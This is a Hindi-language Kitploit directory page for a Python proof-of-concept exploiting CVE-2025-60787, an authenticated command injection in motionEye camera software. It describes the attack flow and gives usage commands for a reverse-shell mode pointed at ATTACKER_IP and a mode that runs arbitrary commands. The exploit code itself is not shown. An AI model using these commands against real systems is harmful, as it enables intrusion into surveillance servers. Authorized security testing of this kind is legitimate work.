Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-60787-POC — CVE-2025-60787 के लिए Python PoC, motionEye <= 0.43.1b4 में अस्वच्छित image_file_name कॉन्फ़िगरेशन के माध्यम से प्रमाणित OS कमांड इंजेक्शन RCE | Kitploit
उपकरण/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

CVE-2025-60787 के लिए Python PoC, motionEye <= 0.43.1b4 में अस्वच्छित image_file_name कॉन्फ़िगरेशन के माध्यम से प्रमाणित OS कमांड इंजेक्शन RCE

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-60787 - motionEye प्रमाणित दूरस्थ कोड निष्पादन

motionEye <= 0.43.1b4 में अप्रमाणित मोशन कॉन्फ़िग पैरामीटर के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन

लेखक: d3vn0mi


भेद्यता अवलोकन

फ़ील्डविवरण
CVE IDCVE-2025-60787
CVSS स्कोर7.2 (उच्च)
प्रकारOS कमांड इंजेक्शन (CWE-78)
प्रभावितmotionEye <= 0.43.1b4
समाधान0.43.1b5

motionEye image_file_name जैसे कॉन्फ़िगरेशन फ़ील्ड में मनमानी स्ट्रिंग्स स्वीकार करता है और उन्हें सीधे Motion कॉन्फ़िगरेशन फ़ाइलों (/etc/motioneye/camera-*.conf) में लिखता है। जब Motion सेवा पुनरारंभ होती है, तो यह इन फ़ील्ड्स को शेल-विस्तार योग्य स्ट्रिंग्स के रूप में व्याख्या करता है, जिससे एक प्रमाणित हमलावर मनमाना OS कमांड इंजेक्ट और निष्पादित कर सकता है।

वेब UI में इन फ़ील्ड्स के लिए क्लाइंट-साइड सत्यापन शामिल है, लेकिन सीधे तैयार किए गए API अनुरोध भेजकर इसे आसानी से बायपास किया जा सकता है।

हमला प्रवाह

  1. valid एडमिन क्रेडेंशियल्स के साथ motionEye में प्रमाणित करें
  2. कैमरा कॉन्फ़िगरेशन सूची प्राप्त करें
  3. दुर्भावनापूर्ण image_file_name वैल्यू के साथ संशोधित कॉन्फ़िगरेशन POST करें
  4. Motion स्नैपशॉट लेते समय इंजेक्ट किए गए कमांड को प्रोसेस करता है (capture_mode: interval-snapshots के माध्यम से)

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी
  • valid motionEye एडमिन क्रेडेंशियल्स
  • लक्ष्य motionEye इंस्टेंस तक नेटवर्क पहुँच

स्थापना

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

उपयोग

यह एक्सप्लॉइट दो मोड्स का समर्थन करता है: रिवर्स शेल और कमांड निष्पादन।

रिवर्स शेल

अपनी मशीन पर एक लिसनर शुरू करें, फिर चलाएं:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

कमांड निष्पादन

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

विकल्प

संदर्भ

  • GitHub Advisory - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Rapid7 Metasploit Module
  • motionEye Project

श्रेय

  • d3vn0mi - एक्सप्लॉइट विकास और उपकरण
  • gunzf0x - मूल CVE खोज और अनुसंधान

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। लेखक इस सॉफ़्टवेयर के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

टूल डाउनलोड करें
फ़्लैगविवरण
--urlपोर्ट सहित लक्ष्य motionEye URL
--usermotionEye उपयोगकर्ता नाम
--passwordmotionEye पासवर्ड
-i / --hostलिसनर IP (रिवर्स शेल मोड)
--portलिसनर पोर्ट (रिवर्स शेल मोड)
-e / --execनिष्पादित करने का कमांड (कमांड मोड)
--camera-idकिसी विशेष कैमरा ID को लक्षित करें
--sh/bin/bash के बजाय /bin/sh का उपयोग करें
--no-verifyTLS प्रमाणपत्र सत्यापन छोड़ें
--proxyप्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें (जैसे http://127.0.0.1:8080)